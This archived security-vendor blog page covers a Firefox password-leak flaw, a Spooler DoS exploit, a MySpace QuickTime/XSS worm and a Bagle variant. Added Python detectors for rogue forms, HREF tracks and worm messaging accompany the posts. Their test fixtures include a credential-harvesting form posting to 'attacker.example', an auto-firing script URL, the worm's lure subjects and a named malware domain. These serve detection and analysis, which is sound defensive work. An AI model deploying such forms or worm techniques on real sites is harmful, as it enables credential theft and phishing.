
    Archive for December 4th, 2006




    A flaw in Mozilla Firefox’s Password Manager allows saved password information to be sent to a remote user’s Web site. This attack scenario only works on Web sites that allow users to create HTML forms, such as blogs and social networking sites like MySpace.com.


    Firefox’s developers rate this flaw as Critical and have observed that it results from Password Manager not checking whether it is sending password information to the correct server. More information about this vulnerability is detailed in the Mozilla project’s Bugzilla database.
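    The flaw is only exploitable on sites that let users publish their own HTML forms, so the site-side mitigation is to audit user-submitted markup for forms whose action posts somewhere other than the site itself (or which carry a password field at all). The following is an added example, not code from this post or from Mozilla: a small auditor built on Python’s standard `html.parser` that reports such forms. The site host name `social.example`, the host `attacker.example` and the HTML fragment are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAuditor(HTMLParser):
    """Collects every <form> in a fragment of user-submitted HTML, noting
    its action URL and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(html, site_host):
    """Return the forms in `html` that would post off-site (any absolute or
    protocol-relative action whose host is not `site_host`) or that ask for a
    password. Relative actions post back to the site and are not reported."""
    parser = FormAuditor()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        parsed = urlparse(form["action"])
        absolute = bool(parsed.scheme or parsed.netloc)
        offsite = absolute and (parsed.hostname or "").lower() != site_host.lower()
        if offsite or form["has_password"]:
            findings.append({"action": form["action"],
                             "offsite": offsite,
                             "has_password": form["has_password"]})
    return findings


def fragment_is_acceptable(html, site_host):
    """Policy: reject the submission if any form was reported."""
    return not audit_forms(html, site_host)


# Constructed sample: a profile page carrying a credential-harvesting form
# beside a harmless site search box and a same-host comment form.
SAMPLE_PROFILE_HTML = """
<p>my profile</p>
<form action="http://attacker.example/collect" method="post">
  <input name="username"><input type="password" name="password">
</form>
<form action="/search"><input name="q"></form>
<form action="http://social.example/comment"><input name="text"></form>
"""

if __name__ == "__main__":
    for finding in audit_forms(SAMPLE_PROFILE_HTML, "social.example"):
        print(finding)
    print("acceptable:", fragment_is_acceptable(SAMPLE_PROFILE_HTML, "social.example"))
```

    Protocol-relative actions (`//attacker.example/...`) parse with an empty scheme but a non-empty netloc, so they are still treated as absolute and off-site; a `javascript:` action has no host and is reported for the same reason.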



    Dec 4, 12:36 pm (UTC-7)

    We received reports of an early Christmas DoS 0-day exploit earlier today and found a PoC on Milw0rm. The problem lies in the GetPrinterData function of the Windows Spooler service; successful exploitation results in a denial of service. We have already submitted it for processing so that an appropriate Trend solution can be created, and we will update you as soon as there is anything to report.








    A new worm has been found on MySpace (a social networking website) that takes advantage of the HREF Track feature of Apple QuickTime movies and an XSS vulnerability in MySpace to propagate and carry out its malicious actions. The malware author also intends to steal other MySpace users’ logins through a phishing site whose URL is advertised by the worm.


    The menace starts when a MySpace user views a malicious embedded QuickTime movie file (.mov). Yes, a movie file… but we are not talking about a vulnerability in QuickTime, but rather about a special feature built into QT movie files called HREF Track.


    An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or load QuickTime Player. They can also specify JavaScript functions or Web pages that load in a specific browser frame or window.



    The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.
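    For a site that accepts user-uploaded movies, the two paragraphs above translate directly into a content policy: an interactive link to an allowed host is fine, but a URL that fires automatically at a timestamp, runs JavaScript, or points off-site is exactly the mechanism the worm relies on. The following is an added example, not code from this post or from Apple, that parses the plain-text descriptor from which an HREF track is built and audits each entry. It assumes the descriptor syntax as commonly documented for QuickTime text tracks (a `{QTtext}` header, `[hh:mm:ss.ff]` timestamps, `<url>` for interactive links, `A<url>` for automatic ones and `T<target>` for the frame target); the hosts `video.example` and `phish.example` and the sample descriptor are constructed.

```python
import re
from urllib.parse import urlparse

# [hh:mm:ss.ff] timestamp line introducing the next text sample
TIMESTAMP_RE = re.compile(r"^\[(\d{2}):(\d{2}):(\d{2})\.(\d{2})\]$")
# optional "A" prefix (automatic), the URL in angle brackets, optional T<target>
LINK_RE = re.compile(r"^(A?)<([^>]*)>(?:\s*T<([^>]*)>)?")


def parse_href_descriptor(text):
    """Turn an HREF-track text descriptor into a list of link entries with
    the timestamp (seconds) at which each becomes active."""
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("{"):  # header/attribute lines
            continue
        m = TIMESTAMP_RE.match(line)
        if m:
            h, mi, s, f = (int(x) for x in m.groups())
            current = h * 3600 + mi * 60 + s + f / 100
            continue
        m = LINK_RE.match(line)
        if m:
            entries.append({"time": current,
                            "automatic": m.group(1) == "A",
                            "url": m.group(2),
                            "target": m.group(3)})
    return entries


def audit_href_entries(entries, allowed_hosts):
    """Return (url, problems) for every entry that violates the policy:
    script URLs, hosts outside the allow-list, and links that load without
    a click are all reported."""
    findings = []
    for e in entries:
        parsed = urlparse(e["url"])
        scheme = parsed.scheme.lower()
        problems = []
        if scheme == "javascript":
            problems.append("runs script in the viewer's browser")
        elif scheme in ("http", "https"):
            if (parsed.hostname or "").lower() not in allowed_hosts:
                problems.append("loads off-site host %s" % parsed.hostname)
        else:
            problems.append("unexpected URL scheme %r" % scheme)
        if e["automatic"]:
            problems.append("fires automatically at %.2fs without a click" % (e["time"] or 0))
        if problems:
            findings.append((e["url"], problems))
    return findings


# Constructed descriptor: one benign interactive link, one automatic script
# URL and one automatic off-site page, in the style the post describes.
SAMPLE_HREF_TRACK = """{QTtext}{timeScale:100}{width:320}{height:32}
[00:00:00.00]
<http://video.example/intro.html> T<_blank>
[00:00:05.00]
A<javascript:doWork()>
[00:00:10.00]
A<http://phish.example/page.html> T<_top>
"""

if __name__ == "__main__":
    for url, problems in audit_href_entries(parse_href_descriptor(SAMPLE_HREF_TRACK),
                                            {"video.example"}):
        print(url, "->", "; ".join(problems))
```

    The policy treats any automatic URL as a finding on its own, because in user-submitted content it executes without the viewer doing anything; a site that wants to permit narrated tours can relax that line and keep the scheme and host checks.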


    This movie file loads a malicious JavaScript file which modifies the user’s profile page by replacing the navigational links on the page with fake ones (pointing to the MySpace phishing site on the same domain) through CSS and HTML code. This approach is possible because of MySpace’s XSS vulnerability. Then comes the ‘wormy’ part of the malicious JavaScript: it adds the malicious QuickTime movie file to the user’s “Interests” section to further propagate a copy of the worm and the phishing attack. Any MySpace user who visits an infected user’s profile will also have his navigational menus trojanized.


    What is also notable about this worm is its capability to send a random message to users with IDs from 80000000 to 105000000. The worm selects one of the six subjects below and sends it to a random user every 6 seconds.



    • what else is there to do on a Sunday.?…….
    • You better not forget about this..
    • Hehe that was so funny..
    • better see this one last time lol..
    • omg did you see this last nite..
    • whos coming to the party tonight.?..

    The body of the message is supposed to be a file named ‘youtubedt7rf2.jpg’, but I unfortunately wasn’t able to get a copy because the source URL is no longer available.
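    The messaging behaviour described above (a fixed set of subjects, recipient IDs drawn from the 80000000–105000000 range, one message every 6 seconds) is a usable detection signature for the site operator. The following is an added example, not code from this post or from MySpace: it runs that logic over constructed message-send log lines and flags senders that match at least two of the three traits. The log format (`timestamp sender=… recipient=… subject=…`) and the sender IDs are assumptions made for the demonstration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# The six subjects reported for the worm, copied from the post.
WORM_SUBJECTS = {
    "what else is there to do on a Sunday.?…….",
    "You better not forget about this..",
    "Hehe that was so funny..",
    "better see this one last time lol..",
    "omg did you see this last nite..",
    "whos coming to the party tonight.?..",
}
# Recipient ID range the worm targets, from the post.
ID_RANGE = (80_000_000, 105_000_000)


def parse_line(line):
    """Parse one constructed log line of the form
    '2006-12-03T14:00:00 sender=555 recipient=84123456 subject=...'."""
    ts, sender, recipient, subject = line.split(" ", 3)
    return {
        "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
        "sender": sender.split("=", 1)[1],
        "recipient": int(recipient.split("=", 1)[1]),
        "subject": subject.split("=", 1)[1],
    }


def flag_senders(lines, min_messages=5, max_median_interval=10.0):
    """Return {sender: [reasons]} for senders whose traffic looks like the
    worm: machine-speed sending, recipients only in the targeted ID range,
    and subjects only from the known list. Two of three traits suffice."""
    by_sender = defaultdict(list)
    for line in lines:
        if line.strip():
            rec = parse_line(line)
            by_sender[rec["sender"]].append(rec)

    flagged = {}
    for sender, recs in by_sender.items():
        if len(recs) < min_messages:
            continue  # too little traffic to judge
        recs.sort(key=lambda r: r["time"])
        intervals = [(b["time"] - a["time"]).total_seconds()
                     for a, b in zip(recs, recs[1:])]
        reasons = []
        gap = median(intervals)
        if gap <= max_median_interval:
            reasons.append("machine-speed sending (median gap %.1fs)" % gap)
        if all(ID_RANGE[0] <= r["recipient"] <= ID_RANGE[1] for r in recs):
            reasons.append("all recipients in the targeted ID range")
        if all(r["subject"] in WORM_SUBJECTS for r in recs):
            reasons.append("all subjects match the known worm subjects")
        if len(reasons) >= 2:
            flagged[sender] = reasons
    return flagged


# Constructed sample: sender 555 behaves like the worm, sender 777 is a
# person sending two ordinary messages.
SAMPLE_MESSAGE_LOG = """\
2006-12-03T14:00:00 sender=555 recipient=84123456 subject=Hehe that was so funny..
2006-12-03T14:00:06 sender=555 recipient=99876543 subject=omg did you see this last nite..
2006-12-03T14:00:12 sender=555 recipient=81000002 subject=whos coming to the party tonight.?..
2006-12-03T14:00:18 sender=555 recipient=103555555 subject=better see this one last time lol..
2006-12-03T14:00:24 sender=555 recipient=90000001 subject=You better not forget about this..
2006-12-03T14:00:30 sender=555 recipient=88888888 subject=Hehe that was so funny..
2006-12-03T14:00:03 sender=777 recipient=12345 subject=lunch tomorrow?
2006-12-03T15:30:00 sender=777 recipient=84123456 subject=re: lunch tomorrow?
"""

if __name__ == "__main__":
    for sender, reasons in flag_senders(SAMPLE_MESSAGE_LOG.splitlines()).items():
        print(sender, "->", "; ".join(reasons))
```

    Requiring two traits rather than one keeps a fast-typing user with ordinary subjects, or a single coincidental recipient in the range, from being flagged; the subject list is the trait most likely to change between variants, so the timing and recipient-range checks carry the detection once the author rewords the messages.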


    Trend Micro has given the malicious JavaScript the detection name JS_QSPACE.A.




    Dec 4, 10:53 am (UTC-7)

    Just a heads up… last Dec 1, we saw a lot of the Bagle worm being spammed through e-mail. Trend Micro looked into this and has created detection for it as WORM_BAGLE.GS.


    This new Bagle has all the techniques that a WORM_BAGLE should have, from the password-protected file to a decoy text file to rootkits. For a more technical analysis, please check the malware report that was created here.


    I checked the download site again today, and what do you know, it’s still there! It has very minor tweaks in its body just to change the MD5 sum in its effort to avoid detection.


    Trend Micro customers need not worry though, as we have already created solutions for this particular sample.


    Admins might also want to block www.bronko-m.ru, which is the domain of the download URL of WORM_BAGLE.GS.




    © Copyright 2011 Trend Micro Inc. All rights reserved.